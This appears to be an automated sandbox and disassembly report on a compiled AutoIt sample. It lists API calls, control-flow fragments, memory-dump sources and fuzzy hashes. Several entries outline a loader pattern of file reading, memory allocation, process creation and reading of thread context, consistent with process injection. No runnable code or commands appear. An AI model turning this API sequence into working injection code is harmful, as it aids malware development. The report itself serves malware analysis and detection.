• Instruction ID: d6672e68ffeed78ba434be4ce119fa1e10800d5a5bf196f8e2f41644cb46c1f5
• Opcode Fuzzy Hash: 413bff81f872addaca3d9ad162024b649ce289641a3285436bc7eb0a5f7ce606
• Instruction Fuzzy Hash: CF21D871780204BBDB14EBF4ED46FAF737CEB54700F10055EB605E7281EAB5AA008768

Control-flow Graph

control_flow_graph 2136 410570-4105f1 CreateWindowExW * 2 ShowWindow * 2
APIs
• CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,?,00000000), ref: 004105A5
• CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,?,00000000), ref: 004105CE
• ShowWindow.USER32(?,00000000), ref: 004105E4
• ShowWindow.USER32(?,00000000), ref: 004105EE
Memory Dump Source
• Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
Similarity
• API ID: Window$CreateShow
• String ID: AutoIt v3$edit
• API String ID: 1584632944-3779509399
• Opcode ID: b28a7d78b19f48c216133de275d8b0452446851dd496b073adb1022152ad6d67
• Instruction ID: 021b1916d714280a6beb379f8f8b29d81737bdb93309e58067b2166fb7f1837a
• Opcode Fuzzy Hash: b28a7d78b19f48c216133de275d8b0452446851dd496b073adb1022152ad6d67
• Instruction Fuzzy Hash: 29F01771BE43107BF6B0A764AC43F5A2698A758F65F31083BB700BB5D0E1E4B8408B9C

Control-flow Graph

control_flow_graph 2137 42093c8-4209524 call 4207018 call 42092b8 CreateFileW 2144 4209526 2137->2144 2145 420952b-420953b 2137->2145 2146 42095db-42095e0 2144->2146 2148 4209542-420955c VirtualAlloc 2145->2148 2149 420953d 2145->2149 2150 4209560-4209577 ReadFile 2148->2150 2151 420955e 2148->2151 2149->2146 2152 4209579 2150->2152 2153 420957b-42095b5 call 42092f8 call 42082b8 2150->2153 2151->2146 2152->2146 2158 42095d1-42095d9 ExitProcess 2153->2158 2159 42095b7-42095cc call 4209348 2153->2159 2158->2146 2159->2158
APIs
  • Part of subcall function 042092B8: Sleep.KERNELBASE(000001F4), ref: 042092C9
• CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 0420951A
Memory Dump Source
• Source File: 00000000.00000002.2145500065.0000000004207000.00000040.00000020.00020000.00000000.sdmp, Offset: 04207000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_4207000_enkJ6J7dAn.jbxd
Similarity
• API ID: CreateFileSleep
• String ID: HCTT8IEAI2UJ63XTN2K1ZHDYWC
• API String ID: 2694422964-788923217
• Opcode ID: 2686f00af71ae1ddb8fa5ea17b761f45c64953d7f7b2489467ae35bbc548ba9f
• Instruction ID: 752207e3680ee871111c53b5d910c84b8052b257a50859bc881acc041f9f99ec
• Opcode Fuzzy Hash: 2686f00af71ae1ddb8fa5ea17b761f45c64953d7f7b2489467ae35bbc548ba9f
• Instruction Fuzzy Hash: 5D61C470E14288DAEF11DBB4C844BEEBFB5AF15304F044198E2497B2C2D7B95B88CB65
APIs
• LoadStringW.USER32(?,00000065,?,0000007F), ref: 0042723B
  • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
  • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
• _wcsncpy.LIBCMT ref: 00401C41
• _wcscpy.LIBCMT ref: 00401C5D
• Shell_NotifyIconW.SHELL32(00000001,?), ref: 00401C6F
Memory Dump Source
• Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
Similarity
• API ID: IconLoadNotifyShell_String_memmove_wcscpy_wcslen_wcsncpy
• String ID: Line:
• API String ID: 1874344091-1585850449
• Opcode ID: 71d679a4a9352c46b300ee00bac0ebd609a16659c7848ecadc14a4878baa23f7
• Instruction ID: 22c0e507134e40740d6fd31dbafdd21c3b8ff828be9a92102ab360472f74cad7
• Opcode Fuzzy Hash: 71d679a4a9352c46b300ee00bac0ebd609a16659c7848ecadc14a4878baa23f7
• Instruction Fuzzy Hash: EB31A1715083459BD320EB61DC45BDA77E8BF85318F04093EF588931E1E7B8AA49C75E
APIs
• RegOpenKeyExW.KERNELBASE(00000004,Control Panel\Mouse,00000000,00000001,00000004,00000004), ref: 0040F267
• RegQueryValueExW.KERNELBASE(00000000,?,00000000,00000000,?,?,00000002,00000000), ref: 0040F28E
• RegCloseKey.KERNELBASE(?), ref: 0040F2B5
• RegCloseKey.ADVAPI32(?), ref: 0040F2C9
Memory Dump Source
• Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
Similarity
• API ID: Close$OpenQueryValue
• String ID: Control Panel\Mouse
• API String ID: 1607946009-824357125
• Opcode ID: 0a2ddf5dd10fc63f6e19eedc2563a5e53f3783e3c799d68c1c3a3a1866560054
• Instruction ID: a31ac2e1b7deaa2d1d9e7506379341dce8fcd1dacbe24dc49005ae4a0027d3ba
• Opcode Fuzzy Hash: 0a2ddf5dd10fc63f6e19eedc2563a5e53f3783e3c799d68c1c3a3a1866560054
• Instruction Fuzzy Hash: 91118C76640108AFCB10CFA8ED459EFB7BCEF59300B1089AAF908C3210E6759A11DBA4
APIs
• SHGetMalloc.SHELL32(0040F54C), ref: 004102BD
• SHGetDesktopFolder.SHELL32(?,004A90E8), ref: 004102D2
• _wcsncpy.LIBCMT ref: 004102ED
• SHGetPathFromIDListW.SHELL32(?,?), ref: 00410327
• _wcsncpy.LIBCMT ref: 00410340
Memory Dump Source
• Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
Similarity
• API ID: _wcsncpy$DesktopFolderFromListMallocPath
• String ID:
• API String ID: 3170942423-0
• Opcode ID: bfe3e3032d26ed5990890659b1503a19068975a9e613434ef85ace480ecdfa96
• Instruction ID: 8627f7bfe00d67ecf541507c27de0d1a6b0c746b93627a891ac6cfe5d1469166
• Opcode Fuzzy Hash: bfe3e3032d26ed5990890659b1503a19068975a9e613434ef85ace480ecdfa96
• Instruction Fuzzy Hash: 4B219475A00619ABCB14DBA4DC84DEFB37DEF88700F108599F909D7210E674EE45DBA4
APIs
• CreateProcessW.KERNELBASE(?,00000000), ref: 04208A73
• Wow64GetThreadContext.KERNEL32(?,00010007), ref: 04208B09
• ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 04208B2B
Memory Dump Source
• Source File: 00000000.00000002.2145500065.0000000004207000.00000040.00000020.00020000.00000000.sdmp, Offset: 04207000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_4207000_enkJ6J7dAn.jbxd
Similarity
• API ID: Process$ContextCreateMemoryReadThreadWow64
• String ID:
• API String ID: 2438371351-0
• Opcode ID: 9a8a17a12fb03160a4a55839945f9e7e1859a6c72d72ca89e8ed8c326fc6e5c7
• Instruction ID: 468ba46b07f234de35b9d2f1ee046f518faffe33f45b6aa170da74217c236a4b
• Opcode Fuzzy Hash: 9a8a17a12fb03160a4a55839945f9e7e1859a6c72d72ca89e8ed8c326fc6e5c7
• Instruction Fuzzy Hash: C462FB70A24258DBEB24DFA4C850BDEB376EF58300F1091A9D10DEB2D1E775AE81CB59
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _memmove
                                                                                                                    • String ID: Error:
                                                                                                                    • API String ID: 4104443479-232661952
                                                                                                                    • Opcode ID: 20a21836adb2195423de36251fb93945767d574b7418eb2d4267c7510a98c7d8
                                                                                                                    • Instruction ID: 2c658176ab693071ca67d4d31bd2fe4acf4d59654e7b744331f3a235cb1e2e29
                                                                                                                    • Opcode Fuzzy Hash: 20a21836adb2195423de36251fb93945767d574b7418eb2d4267c7510a98c7d8
                                                                                                                    • Instruction Fuzzy Hash: 0D3191716006059FC324DF29C881AA7B3E6EF84314B24853FE95AC7791EB79E941CBD8
                                                                                                                    APIs
                                                                                                                    • GetOpenFileNameW.COMDLG32(?), ref: 0042961B
                                                                                                                      • Part of subcall function 00410120: GetFullPathNameW.KERNEL32(00000000,00000104,004A7F6C,0040F545,004A7F6C,004A90E8,004A7F6C,?,0040F545), ref: 0041013C
                                                                                                                      • Part of subcall function 004102B0: SHGetMalloc.SHELL32(0040F54C), ref: 004102BD
                                                                                                                      • Part of subcall function 004102B0: SHGetDesktopFolder.SHELL32(?,004A90E8), ref: 004102D2
                                                                                                                      • Part of subcall function 004102B0: _wcsncpy.LIBCMT ref: 004102ED
                                                                                                                      • Part of subcall function 004102B0: SHGetPathFromIDListW.SHELL32(?,?), ref: 00410327
                                                                                                                      • Part of subcall function 004102B0: _wcsncpy.LIBCMT ref: 00410340
                                                                                                                      • Part of subcall function 00410190: GetFullPathNameW.KERNEL32(?,00000104,?,?,?), ref: 004101AB
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: NamePath$Full_wcsncpy$DesktopFileFolderFromListMallocOpen
                                                                                                                    • String ID: X$pWH
                                                                                                                    • API String ID: 85490731-941433119
                                                                                                                    • Opcode ID: 1b62eedeb2ba23f3a12794f4d72c3fd3ac9c0abd578206ca8986e50026ca9cbc
                                                                                                                    • Instruction ID: b6f0e4d7e30e2857a1e9cc165fafff24640ac0dd2e9829c062eaf90218724cbe
                                                                                                                    • Opcode Fuzzy Hash: 1b62eedeb2ba23f3a12794f4d72c3fd3ac9c0abd578206ca8986e50026ca9cbc
                                                                                                                    • Instruction Fuzzy Hash: 1F118AB0A00244ABDB11EFD9DC457DEBBF95F45304F14842AE504AB392D7FD08498BA9
                                                                                                                    APIs
                                                                                                                    • _wcslen.LIBCMT ref: 00401B11
                                                                                                                      • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                                                                    • _memmove.LIBCMT ref: 00401B57
                                                                                                                      • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                                                                                                                      • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                                                                                                                      • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: std::exception::exception$Exception@8Throw_malloc_memmove_wcslen
                                                                                                                    • String ID: @EXITCODE
                                                                                                                    • API String ID: 2734553683-3436989551
                                                                                                                    • Opcode ID: b6d17f11840b334af4eb2c0dc4703dd6ec7fe6b5974f9b569570c14fa5f7c58b
                                                                                                                    • Instruction ID: 16ac7666fc6b8d0cd4c8082de1062d74cbdf630d8e5b0a9ec9a55ac2b86b5c72
                                                                                                                    • Opcode Fuzzy Hash: b6d17f11840b334af4eb2c0dc4703dd6ec7fe6b5974f9b569570c14fa5f7c58b
                                                                                                                    • Instruction Fuzzy Hash: D5F0CDF2B00641AFD720DB36DC02B6775E49B84308F04883EA24BC6795FA7DE4828B14
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 7af5e299b258df5e9c9a2551ed0e7af6e1d4c875de24c7fdf76d77545964eae0
                                                                                                                    • Instruction ID: 8c99b1ef877cebc7a747b8a97cc81d83a07aa3771b44d3adc2ea031a64448d8d
                                                                                                                    • Opcode Fuzzy Hash: 7af5e299b258df5e9c9a2551ed0e7af6e1d4c875de24c7fdf76d77545964eae0
                                                                                                                    • Instruction Fuzzy Hash: CEF18C716043019FC700DF29C884A5AB7E5FF88318F14C95EF9998B392D7B9E945CB86
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: __filbuf__getptd_noexit__read_memcpy_s
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1794320848-0
                                                                                                                    • Opcode ID: b5af9ce9d8135965a8c163c1359f1833c669f36246c0dfec509ee2915f8c5eb0
                                                                                                                    • Instruction ID: 2f36134af58cf06217a4581a57f76d3547d7b7b98d7afe96428f3577b7504850
                                                                                                                    • Opcode Fuzzy Hash: b5af9ce9d8135965a8c163c1359f1833c669f36246c0dfec509ee2915f8c5eb0
                                                                                                                    • Instruction Fuzzy Hash: 6C51E631A01208DBCB249F69C9446DFB7B1AFC0364F25826BE43597290E378EED1CB59
                                                                                                                    APIs
                                                                                                                    • GetCurrentProcess.KERNEL32(00000000,?,00000067,000000FF), ref: 004753C7
                                                                                                                    • TerminateProcess.KERNEL32(00000000), ref: 004753CE
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Process$CurrentTerminate
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2429186680-0
                                                                                                                    • Opcode ID: aaa6002d905a33e4c3ceade7f85f71e7f986a1c67485104df61a1a5e3f63762c
                                                                                                                    • Instruction ID: dddcdfafc98398d1c0f0a19edd80e49036cf45bbfca44c020541658de01b6296
                                                                                                                    • Opcode Fuzzy Hash: aaa6002d905a33e4c3ceade7f85f71e7f986a1c67485104df61a1a5e3f63762c
                                                                                                                    • Instruction Fuzzy Hash: 2C519D71604301AFC710DF65C881BABB7E5EF88308F14891EF9598B382D7B9D945CB96
                                                                                                                    APIs
                                                                                                                    • Shell_NotifyIconW.SHELL32(00000000,?), ref: 0040E1A7
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: IconNotifyShell_
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1144537725-0
                                                                                                                    • Opcode ID: 02018e3f435d091181cdea07546ede041b4d96144d17d916b2823846d4297506
                                                                                                                    • Instruction ID: eb3a406907b17a2fb372061a5351d340f380801689ea858bebf243c914dbfa85
                                                                                                                    • Opcode Fuzzy Hash: 02018e3f435d091181cdea07546ede041b4d96144d17d916b2823846d4297506
                                                                                                                    • Instruction Fuzzy Hash: 16318F70608701DFD320CF25D855797BBE4BB85314F000C3EE5AA87391E7B8A958CB5A
                                                                                                                    APIs
                                                                                                                    • _malloc.LIBCMT ref: 0043214B
                                                                                                                      • Part of subcall function 004135BB: __FF_MSGBANNER.LIBCMT ref: 004135D4
                                                                                                                      • Part of subcall function 004135BB: __NMSG_WRITE.LIBCMT ref: 004135DB
                                                                                                                      • Part of subcall function 004135BB: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,004115F6,?,00401BAC,?,?,?), ref: 00413600
                                                                                                                    • _malloc.LIBCMT ref: 0043215D
                                                                                                                    • _malloc.LIBCMT ref: 0043216F
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _malloc$AllocateHeap
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 680241177-0
                                                                                                                    • Opcode ID: ab61ccc74db86e6fcdeb904a32b1d9569ed7ac6f88b96914968634a5dd1a0039
                                                                                                                    • Instruction ID: dac51259f70ca5acf95ac1b1a30df86389447b5c3122b5fc7e5239b6c816f1c7
                                                                                                                    • Opcode Fuzzy Hash: ab61ccc74db86e6fcdeb904a32b1d9569ed7ac6f88b96914968634a5dd1a0039
                                                                                                                    • Instruction Fuzzy Hash: A0F0E273200B142AD2206A6A6DC1BE7B39ADBD4765F00403FFB058A206DAE9988542EC
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 0040F760: _strcat.LIBCMT ref: 0040F786
                                                                                                                    • _free.LIBCMT ref: 004295A0
                                                                                                                      • Part of subcall function 004033C0: GetCurrentDirectoryW.KERNEL32(00000104,?,?), ref: 00403451
                                                                                                                      • Part of subcall function 004033C0: GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00403467
                                                                                                                      • Part of subcall function 004033C0: __wsplitpath.LIBCMT ref: 00403492
                                                                                                                      • Part of subcall function 004033C0: _wcscpy.LIBCMT ref: 004034A7
                                                                                                                      • Part of subcall function 004033C0: _wcscat.LIBCMT ref: 004034BC
                                                                                                                      • Part of subcall function 004033C0: SetCurrentDirectoryW.KERNEL32(?), ref: 004034CC
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CurrentDirectory$FullNamePath__wsplitpath_free_strcat_wcscat_wcscpy
                                                                                                                    • String ID: >>>AUTOIT SCRIPT<<<
                                                                                                                    • API String ID: 3938964917-2806939583
                                                                                                                    • Opcode ID: 54ef76e4734de236163cd7b280f05d5101af8392224d903fd41af02c4ea86240
                                                                                                                    • Instruction ID: c8289cc7cde30cfde4dff3f83c8481f20f860a5b07fa540731426c520eca24fb
                                                                                                                    • Opcode Fuzzy Hash: 54ef76e4734de236163cd7b280f05d5101af8392224d903fd41af02c4ea86240
                                                                                                                    • Instruction Fuzzy Hash: 9A919171A00219ABCF04EFA5D8819EE7774BF48314F50452EF915B7391D778EA06CBA8
                                                                                                                    Strings
                                                                                                                    • >>>AUTOIT NO CMDEXECUTE<<<, xrefs: 0042804F
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmp
